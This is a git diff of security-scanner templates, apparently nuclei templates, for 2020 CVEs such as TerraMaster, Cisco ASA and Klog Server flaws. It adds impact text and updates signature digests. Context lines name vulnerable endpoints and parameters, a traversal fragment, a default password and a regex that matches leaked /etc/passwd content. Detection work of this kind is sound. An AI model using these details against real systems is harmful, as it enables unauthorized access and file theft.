--- a/http/cves/2020/CVE-2020-28188.yaml
+++ b/http/cves/2020/CVE-2020-28188.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
   remediation: |
     Apply the latest security patch or update provided by TerraMaster to fix the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: {{useragent}}"
-# digest: 4a0a004730450221009b3ce21788f904889394157e2e7c1e64c1306ff6193c44d3f58d1f4d2ba4b172022031285d59414ad080d57c22686adcf18f4882a4872333119c74c43b5fc44b4401:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bb835263524ac7280518e3c964f139d2a998311eec5391070168747699d51aed022100ac8f37a46be5cf83c2778cf5b0a87e408bd23b0b59f797797a781d090a42b833:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml
index 7b67c83ed5..3fbb980839 100644
--- a/http/cves/2020/CVE-2020-28208.yaml
+++ b/http/cves/2020/CVE-2020-28208.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system.
   remediation: |
     Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208).
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201a3debaa0f5f898bb7c089c885bf75888b8464285d8cf488727beae4c7902591022100836defb7073baa4638d4b6eade4cc75f75894409cdde90b76f5e142093ab8327:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220583ee5efd541b916cb0334f645d36566e893efcafd36893d376d78ffed062c2a022100aa4f089d9e1c22b4953827faef4c3f918064facca49e170220023bd19094dd9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml
index 2c439bf096..bee3eb44be 100644
--- a/http/cves/2020/CVE-2020-28351.yaml
+++ b/http/cves/2020/CVE-2020-28351.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ddd84c620c1f201eafe8c22fcc4f581561ce6c5e2927a898d6282a57d454d61402210084c6fba2f5ef8b04e3497b49971ca72ba04b1b9973ce68c2e4b1bce36b3b1fbb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207a96a28317ecbc759d164b83dbf680481223c74266062f72ca9aaedcfa49bf950221008efd9a955d7fc6fe635c5587bf1f3f7dd972385bd95d850b55d9a48658f1f268:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml
index 300ecdfb5a..d5fede3cac 100644
--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system.
   remediation: |
     Upgrade to a patched version of Monitorr or apply the necessary security patches.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f77938c0b8e37c9e1496d51b88d9b05f9c4f177ebea07b96368342e33d88ffeb022100c3442e6305f0d2b1a964a228701ae6db5a3e343b8f945d6b8c39b68a055539b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210091ef5c242c9b65a65cb2f14a677d25036ab0f49c951ca568b8b2aa36b20e3ce6022031eea02c83d3fe1d3c15c7e079c827f8bd2eafe05f6172181e8116330ea7391b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml
index 5f7be44a80..220497d9a8 100644
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@@ -5,6 +5,8 @@ info:
   author: LogicalHunter
   severity: medium
   description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
   remediation: |
     Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201f1693e9570519272224684b59f512993e786eabdd67b480c3cb1b05e1dad0a50221008b84a722a90d4715ee6e0ddd51c59709bfdd487baaf42dab7607a6aba7eef7fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b17124b998d12684208ed32d7ccde832dd6240b55197548cd9ed98266786ce8e02205a8b9ed2b9f928298fed6a944e9537a0fa2916afea8f72855bb1d49391f5eb62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml
index b2b199162e..641b4382b8 100644
--- a/http/cves/2020/CVE-2020-29164.yaml
+++ b/http/cves/2020/CVE-2020-29164.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f2f755d45c926bdc6f056be39c45fbdf643b2a47e0babf9fe3cd454250760efa022100d333f50d4efc4013c9563c60215f443e8c4f28cd9d3c61dcc7b0be921328b5c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f552f25d105d8cb802826cdf1b9c9a61013ca50f08011ccdcdb0f7d174dd78bb022007b4da07afcad0d7f938c0e6610ad008c3c44dc1f5c29bf4961e1e39b78adb08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml
index ce3cabb7f0..19b139c2b0 100644
--- a/http/cves/2020/CVE-2020-29227.yaml
+++ b/http/cves/2020/CVE-2020-29227.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: critical
   description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210095c08306878f197b4a89ebb88105a629d2e81a111bcbaaa44314c4d50dcf994b02207c6fc830d18ef9a943652bce6d6e4572ae5fb990ac728a7902cf0abb435769b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206404417b5ac79a8c53d081807553314950521a9efb67d659aa3883e50d3cdb41022034f461148f6c8b9119f76a7279d58bfcf52124fc66938c35c180d3e65730c2ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml
index 90215ba6fe..bcbdf2e43a 100644
--- a/http/cves/2020/CVE-2020-29284.yaml
+++ b/http/cves/2020/CVE-2020-29284.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Multi Restaurant Table Reservation System 1.0.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210082473bd029791dc66a5d0beeefe563c30eb977fa4292effb901523842d88a08202205e07dc123fc7db19a8fd8c0207a0b58334b873228d57c258dd5733100b1f2be7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022034a8edeb916a7be3c2675b4cdfb9232f890e68f8dfef244b7967006aee796dc8022100a3c2993d21ffd326a08109dd566b8e2ce4c004497eff080fc9079703dfcbe6c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml
index e274d1ae7c..589a7917d9 100644
--- a/http/cves/2020/CVE-2020-29395.yaml
+++ b/http/cves/2020/CVE-2020-29395.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
   remediation: |
     Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022059ff092b3da8af51ceede1c8c96654bbf50982531149900f465b7ded1094ae380220515034d5b3c3f8be9f7784cea161f90cfb25c0f1e8c9b42e9cba366a3b412360:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200972956ed918cfcf08d885d13d4aee62642025ac8552d3ca599cd614d939e458022100df80232a9f3c22888846f91a378fb3aa1cacf8a40c38d5b29492284d06689b86:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml
index b186deb99d..abf38eacff 100644
--- a/http/cves/2020/CVE-2020-29453.yaml
+++ b/http/cves/2020/CVE-2020-29453.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
+  impact: |
+    An attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access.
   remediation: |
     Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100abdc1dff6a88e3a6867ed5d113ea9764065b89c80c40571e5422f727ea56c17b0220721a1b47b283cd0dfc3035f49b19aa32816b138e29fac346a84d24a092db204a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210086ad8f8f5ec71f359ac748b87d15fce6496b4ef687ff8a67df89c0fd7ab44da3022100ea971492a08276dd1ffe28aa73e97556e07585c3cb170c6f3954a4c631b2ba95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml
index fe7bae8c31..3ff3dc900c 100644
--- a/http/cves/2020/CVE-2020-29583.yaml
+++ b/http/cves/2020/CVE-2020-29583.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
   remediation: |
     Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207c9b81b0657465082cb131dabcf73919a763d063da81f048979d5eafcecee868022060d5aa6327234ed3912fba6df8ce53aca68042d7df18f35da42c6238322277f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220094e88527a0f4701410595b3361b9bcdee182c6ccfc6b1d516a38e7b7b682b7702205e231b8a001a282d9bdc41ab892a38cf59abe18a2a7d5febe1d59214891ba3b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml
index 93deca8801..c749b954c1 100644
--- a/http/cves/2020/CVE-2020-29597.yaml
+++ b/http/cves/2020/CVE-2020-29597.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
   remediation: |
     Apply the latest security patch or update to a version that addresses the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
         part: body_2
         words:
           - '{{randstr_2}}'
-# digest: 4a0a0047304502200aad7c18dd1ed411e0f41524015186cc3d219fba966fcb41c3ded8769ad9343b022100c8edcc223c301efcd26c01d0f2b8e91c11dfa705274feb23223ec865b39c1e84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022066debd9dc807bf6041ab2078949147278a347b04e78d34348ee35057cdf8165f022100f03f8d1e1acad42f76445d804c828f8d9317cef66415ed55a09902f5637facf3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml
index 3506c3828d..d533da72e7 100644
--- a/http/cves/2020/CVE-2020-3187.yaml
+++ b/http/cves/2020/CVE-2020-3187.yaml
@@ -5,6 +5,8 @@ info:
   author: KareemSe1im
   severity: critical
   description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the affected system, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c9493f29802bcb815db13aa5e1d1453ae2b6996d7f6cff95c0d71035ae948d12022100e5acb37d75fba7e22a75e3cf47fbd67f8477316eb522cd87a44d5192684c64d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b77cf40d3ce3073335410f3c9673e5d305713fe77a35938650cbed69abaa59750220482d23c0817c34332ae6909d2976d480022825a1bd6b5d554fbcd55296be2295:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml
index 24a623073a..bb4e6cfb7a 100644
--- a/http/cves/2020/CVE-2020-3452.yaml
+++ b/http/cves/2020/CVE-2020-3452.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Cisco to fix the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - "INTERNAL_PASSWORD_ENABLED"
           - "CONF_VIRTUAL_KEYBOARD"
         condition: and
-# digest: 4b0a00483046022100ff11ff4d0f5fabc69720b96b881d1c11212060da556123fed72ac77751982098022100ed5b80eeeed02ef4390dd919d534e588b90dc3c15330ff5de5c36b19b42bf406:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100da42b2419c83ff7a12328a0a97c5724ca07eb89f2e3e8c830a603b9ef1ca06ad022100dbab63dff03349ac656e68a2c66bfbe9d356a4b5222eeb7c1f4815881554c322:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml
index 875289f2b1..0cde6078dd 100644
--- a/http/cves/2020/CVE-2020-35234.yaml
+++ b/http/cves/2020/CVE-2020-35234.yaml
@@ -5,6 +5,8 @@ info:
   author: PR3R00T
   severity: high
   description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
+  impact: |
+    Low: Information disclosure
   remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35234
@@ -38,4 +40,4 @@ http:
           - "log"
           - "Index of"
         condition: and
-# digest: 4b0a0048304602210099a3451138679ad4f5f2f64d3d3d5d3ea6dffca21485b3112414f6b2734482cd0221009eb617d1d4ef4422d698a7631f4a00fd6480ed6c490509bc3b4be049dece044a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b521e7a5e4bfa4c9fbba9521a62d7a341e6303d6bdae93ac1181a4d88f6bd9b70221009b983039addbc133979d1ab62305d94ce4c10f206b7f602cd67e07fcd1186dce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml
index b11c5141fb..aec3d187ef 100644
--- a/http/cves/2020/CVE-2020-35338.yaml
+++ b/http/cves/2020/CVE-2020-35338.yaml
@@ -5,6 +5,8 @@ info:
   author: Jeya Seelan
   severity: critical
   description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the server.
   remediation: |
     Change the default credentials to strong and unique ones.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022033c3b21c60af7a5e89e7570173ed661f904f3fd38b463d95f9bf1aa8452e9cfd02207090ef685e096e28f77082d108081584245817f2975aaf3a114b7f1aa00722fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fd040ebe9def1ba93378d72e00faf88ce69c9e57f142f94b2df4943ed437a4af02206cfec6adf899544202e00cc2f21225366ed2db4fb8a47dcdb7a7619fff1a6776:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml
index 78cc2564e7..099051752b 100644
--- a/http/cves/2020/CVE-2020-35476.yaml
+++ b/http/cves/2020/CVE-2020-35476.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ba1885f0e428813c503714ae453f4b9b200beecc61fef594622ff9610f6936bc02207610a6a5e026992e05a8356329a9196d92a08d27c7bf79e2ac5592ec14a015b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206b1678ca6e5e115fb0ff8283c94e72daa7894916a19eaca9a7ff6bb08c30b90f022100a813ffe00355906ff0df06af6f4adbab4ea6b5eeb1725cb0e5d7fc8577c3babd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml
index cd5d831559..6073faed30 100644
--- a/http/cves/2020/CVE-2020-35489.yaml
+++ b/http/cves/2020/CVE-2020-35489.yaml
@@ -5,6 +5,8 @@ info:
   author: soyelmago
   severity: critical
   description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to the target system and potential remote code execution.
   remediation: |
     Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         group: 1
         regex:
           - "(?m)Stable tag: ([0-9.]+)"
-# digest: 4b0a00483046022100cf80d5a3aadbc4d67586dd40d3c3c7ff6349669687bd7532f060d3ab737735cc022100f0d1b2cfe3f370f07adb65a83f9642180f4f43b2fcff32aa2529a625c6c96175:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207fcc33af058c40ef12b4cc2e83fb41c1e7480d31cd62451f643693244860502702203e4ee3f3d0c0a17105bd8d07b1241fad0f85a7351706886cbf29501c41acd7d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml
index f727579ea1..db246ba91b 100644
--- a/http/cves/2020/CVE-2020-35580.yaml
+++ b/http/cves/2020/CVE-2020-35580.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in  FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
   remediation: |
     Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4a0a0047304502204092e4d53609fe92ee61117d14d13653d12482708ac438c29af5fa7f0cb9f7bb022100cf55581d23eb64da7de66059ff75234a0aad56b74814db4d386303966aea29b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cdad463293bdcaa0e9f4ab0f2162de2d14dcc58e54d21760617f590a8135fb4f02204f36486427f4222a41ae9c0c55c7c6ff17b20fc7a3c0c7674f377e6cf542486b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml
index b457b4480c..21f9a0107b 100644
--- a/http/cves/2020/CVE-2020-35598.yaml
+++ b/http/cves/2020/CVE-2020-35598.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022009a4e2951ca527bb1e4c5ab4714cd6aa4140bb496189214d77cb60e1b8d0b1b6022100f8aed1374e5963af92a71e631279d15e31db99b6a9fdbd2d0a765cbdde2e85d3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200df38614cb31e6bef49adef0c8b2e4d227794313f1b75f6390c87050a62fb4590220385362c4075988a57f71b5b38893443406e43cbbd21f9655f93817662c926cc7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml
index 0b947f4945..d391a16ea5 100644
--- a/http/cves/2020/CVE-2020-35713.yaml
+++ b/http/cves/2020/CVE-2020-35713.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
   remediation: |
     Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later.
   reference:
@@ -42,4 +44,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4b0a00483046022100b5ecb9c5fe28923ff643805973eb2192c33fca5612ebecf81e6a03bd170bd02402210096e88bcb3df3885575f5132b90320a3d1e17570c93152e2f7124fff57a95d1ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008aa2cb4dc3adea3f6bde3b1d4338caa77e618b58c47bdd54a2e7cd171d7d2ddf022100c58484bcc21b34ce4bf872b47b754ba331238619313fc2697a0bb6064ff94090:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml
index 6591c7ba7c..96ed0eb917 100644
--- a/http/cves/2020/CVE-2020-35729.yaml
+++ b/http/cves/2020/CVE-2020-35729.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
+  impact: |
+    An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.
   remediation: |
     Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: word
         words:
           - "poc-testing" # from Base64 decoding payload
-# digest: 4a0a00473045022100e9de74e85e10860c318a36575abe43e01950ce277ff75f4b2e11718f11942d240220275879709811f1af5cb2ac6e49eaaeea01eccebe204a64081520ab93056c406c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210088624c76485923a912d6bdce3d4fde921c54ee01e6640e14a7f21e369a52d077022100a01069fd7e5e10d5a927895ad59d41dd991be5fb2d6784ff7099d1fde1228ed4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml
index 4592a7bee2..d53cfe17ac 100644
--- a/http/cves/2020/CVE-2020-35736.yaml
+++ b/http/cves/2020/CVE-2020-35736.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f44d1de2b986040a9e3ab9914b8b7755604d233cfbe69612b46c2d2d233760eb0220626593de0c6d6bdfff41f620d2efd2b9efb62c342a9a1c18440e13e1953314d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e106ea92c9d7ed8ceebd2cd4575e6f10248dab3b363e1177c45d93185a981828022100a270f47ca570bfd9ee8e32270211d014d12ce5b4c170688617f1f8d6a60661c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
